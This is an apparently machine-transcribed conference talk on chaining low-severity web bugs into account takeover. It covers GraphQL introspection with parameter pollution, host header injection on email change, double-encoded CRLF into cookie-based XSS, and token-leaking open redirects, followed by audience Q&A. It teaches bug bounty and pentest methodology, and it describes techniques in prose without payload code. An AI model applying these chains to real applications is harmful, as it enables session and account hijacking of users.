Tale of Chaining Bugs for Account Takeover

now we can move to the next session okay so I guess everyone knows him is posting the challenge of posting the learning every day okay so can we have a big round of applause for the harsh watra to present his talk on tale of training box for the account takeover all right hello everyone uh today I'll be talking about uh tale of chaining bugs for account takeovers so a quick introduction I work as an application security engineer or you can say trash at H1 so you a lot of folks I have handled your reports and today I'm gonna give you some tips and like how can you convert your low hanging fruits into some really you know dollar giving bugs

I am a co-lead pen tester at Cobalt and I also manage community and product growth with Ecto I have authored two books you might have known me from learn65 or security explained series uh I I do sometimes write blogs or create mind maps and content okay so a quick agenda for today would be you know to discuss about account takeover and leaving you with a simple question if it's a vulnerability or an impact then some ignored vulnerability or I would say low hanging fruits uh which usually gets closed as informative or not applicables or something like that and how you can utilize those vulnerabilities to basically convert them into some high paying vulnerabilities like account takeovers

okay and uh that's gonna all about it so I have uh created a quick poll on Twitter uh you can go to harsh water underscore and quickly answer whether it's a vulnerability class or impact like what do you think what are account takeovers a vulnerability itself or an impact okay okay so these are some of the ignored vulnerabilities or mostly I would say are closed as informative or low like open redirection crlf injection graphql introspection query missing content security policies or HTTP security headers hosted injection uh rate limiting on API fuzzing pass for example you have something api.something.com and fuzzing is missing over there like people say that we can do directive brute forcing and stuff like that but

you can do a lot of things uh lack of server side validation external or I would say like you know uh DNS interaction or something like that product pollution uh if you are into Mobile pen testing you might be knowing about deep links so deep link misconfiguration uh a lot of applications are using saml SSO so oauth misconfiguration and at the end HTML injection so these these are a few like ignored or I would say like low hanging books which generally in bug Bounty space are closed as informative not applicables or low okay uh so today I'll be picking up a few topics uh I'll take four of the bugs and that I have found

are one of like most pink bugs in account Decor category and they are like pretty logical and easy to find okay so these are the four books graphql introspection to account takeover hosted injection to account takeover crlf which was leading to cross-site scripting again to account takeover and at last open redirection to account decor okay so uh going with the first one so introspection queries usually like giving you a schema information about graphql and most of the application it's accessible as an authenticated user as well right so as soon as a lot of you might have reported on bug crowd H1 or other platforms and you see that it's getting close informative saying that it's not leaking anything sensitive

right but always go and visualize that particular query so in this case what I did is like the application was allowing any unauthenticated user to basically run the instruction queries informative again now after digging and basically visualizing you can create graph of these queries and see like how various relationships and links are built on operations I I found very interesting operation get user ID by email and generate what token using email okay this definitely caught the eye over there and then authenticated attacker like I'll uh basically sign up to the application login as the attacker account and I'll simply perform any authentic addiction to reach the graphql endpoint once I am at graph endpoint I'll manipulate the query to basically

run the get user ID by email query now I have the user's uuid emails are easy to guess you can obviously create a list and Brute Force so I now have the uuid which is one of the like complicated scenarios in bug Bounty you will see that from try just that hey how would you go and enumerate the uuids right now once I have uuid now I can go ahead and try to get the oauth token of the victim user now here come another problem is that it won't throw me the token directly so the next part is was a logical manipulation or you would say parameter pollution what I simply did is like on that operation I simply add

attacker ID comma victim ID and it throwed me the victims or token now I can access the victim session and perform the queries it's stories still like not ended over here using that victim sword token I was able to change their email address and then reset the password and it lead to full account takeover okay so initially the civility was informative when I reported this bug and then we escalated because it was more of like on the Curiosity part and it ended up in the critical it was a pride program and it was a five digit uh bounty okay so the next one is uh hosted injection on email change so a lot of time we hear that we do password reset

poisoning we find hosted injection on uh endpoints like you know reset password or change password like of that and it's an account record that's a common vulnerability uh this was uh interesting one this was from one of the pen tests that I did so the application was sharing the same code base so for example you can either sign up as an external user so for example hershey.gmail.com as well as hush at the redcompany.com so from the company.com you will have access to an additional dashboard that allows you to reset the password for all the users now I simply tried hostage injection on almost all the endpoints terribly failed I then run collaborator everywhere and on this

email change endpoint I found that I can do the Hostetter injection so what I did is simply I try to change my external user gmail.com to hush at that company.com the uh company.com guy received uh that email he clicked on that I received the old token because I had the accounts obviously that was for the demo purpose right so uh once I was able to steal the confirmation token I was able to escalate my privilege to that internal dashboard and as soon as I had I would able to change almost everybody's password and that was a mass account again from informative scenarios to critical great so the next one is crlf to cross-site scripting that led to account

takeover now a lot of times we find Cookie based injections uh cross-site scripting which is closed as self accesses okay in this scenario uh there was a self-processed scripting via non-existing cookie parameters so I always say that first the cookies cookies has a lot of value so like anything like let's say random equals to crosstalk scripting payload and will go and execute okay now first the application further and found that there was a crlf injection through double encoding basically like you have to double encode the CRF sequence now use the CRF sequence injection into a non-existing cookie parameter and created a payload something like you know uh something.com then the crl for injection payload which

is double encoded uh value equals to cookie colon access payload okay now this is a pure reflected SS xss payload anybody will go any authenticate and authenticated user will go to this particular link and it will execute into CrossFit scripting it's still a medium severity issue now further uh I was curious enough and noticed that the oauth token uh the JWT token was passed as a cookie parameter as well as the authorization header right in that scenario I was able to basically create a session hijacking POC hijack the user session change their email reset the password and again full account takeover initially it was informative self processed scripting and you can uh chain it to something critical

okay so the last one is the open redirection to account record a lot of you might be thinking like you know the trousers ask that you know open reduction issues are closed until you can demonstrate the further security impact so this is what you can do next time that how you can go and uh you know demonstrate the further impact now so this particular application it had multiple sub applications so for example you have a quite a big set of application then you can go to let's say module a Model B model C and whenever you click on a specific module or sub application it will generate an auth token to basically authenticate you to

that sub application okay now in that direction parameter I was able to find an openly Direction simply the attacker was able to access the sub application because I said this particular parameter to let's say hirsch.com it redirected the token along with it I was able to extract the token and access the sub applications now it was not critical it was high because I cannot still access the main application uh that's a different story that I was able to pre-wescalate later so it was high and the company like awarded in a three digit Bounty okay there are some other interesting scenarios as well like HTML injection to AWS Merida leading to a AWS account takeover so for example uh

you have a template generation functionality for example uh in a website builder or something like that where the HTML code can be processed on the server side or they are basically taking your HTML code rendering it to generate some let's say form or preview Pages you can iframe AWS mediter API if they are not secure and perform and complete AWS account Takeover in the mobile phones you can use secure deep links to basically perform account takeover password reset poisoning is again a classical example Mass assignment is like uh you might have seen something like admin equals to true in the response and you you can add it into your request saying admin equals to true and your low privileged user become

admin user something like that so then uh you can perform either on multiple places to perform account takeover uh so lack of server side validation in email during registration leading to account takeover this is a a very interesting scenario so for example there is a public sign up but that allows sign up only via company email let's say Hershey's company.com now what you can do if the server side validation is missing is you can capture the request in your burp suit or any zap proxy or anything and simply change harsh at that company.com to let's say hush at their gmail.com and if there is no server-side validation you will be able to access the internal database

right so that that was my first blog on this vulnerability and they pay really well for these scenarios because they they are mostly like logical Works seems very easy to find and they are pretty you know High reward thing because most of the time the application owners they care about their users and their data so uh my Target in bug bounties or pen testing is always first to focus on like how you can Target the logical or business logic kind of things how you can steal their data and then I jump to the server side attacks so I have some next plans like I'll be launching an updated mind map on different techniques for account takeover and there will be

more uh you know stretch version of this talk where I'll be explaining like 20 kind of different scenarios on account takeover a quick summary is like a Crux of this particular talk is to dig deeper uh don't stop whenever you find a low hanging vulnerability if you have found let's say open a direction or a self access or something like that give that vulnerability some time go back to the application find how you can change different scenarios and at the end of the day how you can add value to the program team how you can give them something really critical or sensitive to you know patch for and they they really pay well and trust me training is

something that is always helpful uh thank you folks for listening to me and that's all if you have any questions feel free to ask I just have a simple question related to graphqli a subject has its own mind map and it and each mind map has its own methodology so what kind of methodology I should keep while reading graphqli okay so uh graphql is you know really interesting and fun to play uh every time you uh so what I do when I test graphql is I first go and check if I can access the instruction queries as an unauthenticated user because it will give me a very good view about the schema and everything right now I'll

visualize it basically okay after a visualization I usually go and search for some interesting operations for example uh you know in application what happens sometimes you don't see the operations in use but in the schema you will see those operations so these uh are more of like you know undocumented operations uh like you know on the apis you see undocumented endpoints right so look for those specific operations and now see that how you can utilize those operations and again uh perform some interesting logical attacks over there so I have written a Blog on graphql attacks you can find it on Cobalt's website so maybe you can go and have a read about it and if you have any doubt

any further uh you can reach out to me on Twitter or LinkedIn and we can discuss as well okay so my second question is uh kind of like similar one if you have to put graphql into simple words uh what would be oh I am still like uh so second question is similar like to first one so if you have to put simply graphical qli into some simple words what would be uh sir do you understand Hindi yeah like simple words [Music] they compressed all the API endpoint into a simple thing right it's like a One-Stop shop for everything it's like your Supermarket where uh come to one place and you will get each and

everything so this is I guess a simple definition to graphql I would say uh instead of going through all those thousand uh requests you now have to care about securing only one end point securing only one operation type securing only one mutation type right so it's it's like you need not to uh have a very big uh variety of shops and keep 10 uh watch guards or watchmans over there keep one Supermarket keep one Watchman and that's all so it saves a lot of time for developers uh it's easy for ad uh you to add new operations new mutation each and every time and if you have one endpoint secured uh it does a job like

you know pretty well I guess it answers your questions right any other questions Hiers my name is first of all thank you so much it was an amazing talk uh my question to you is that as you mentioned about the CR7 crlf and xss nowadays it is very rare to find crlf vulnerability so do you use any particular word list for that or how do you find those again the point is like uh obviously crlf is rare but it's like not totally disappeared right so uh usually what I do is I have my own first list created I use Simple burp intro to First it so you can fuzz it and again it's more about

you know trying your luck and see if some application is having that particular vulnerability open or not uh it's possible like it might not have and it's possible it might have so obviously it's obsolete because of new Frameworks and each and everything but again you know uh first it and see like if it is getting reflected like simply set a value and one thing you can also do is intrude it and also set a match and replace rule in verb shoot and see if your response is getting reflected uh in the burp suit and that's how you can detect if this is vulnerable so you have a custom word list you don't use a particular word list yeah because

obviously like most of the bug bounty hunters and Pen testers have their own word list because you know at the end of the day you have to stand out of the crowd so you have to work on your own kind of methods and techniques to go about finding the books okay thank you yep all right we are good to move forward thank you so much for the very informative session can we have a big round of applause for the amazing session [Applause]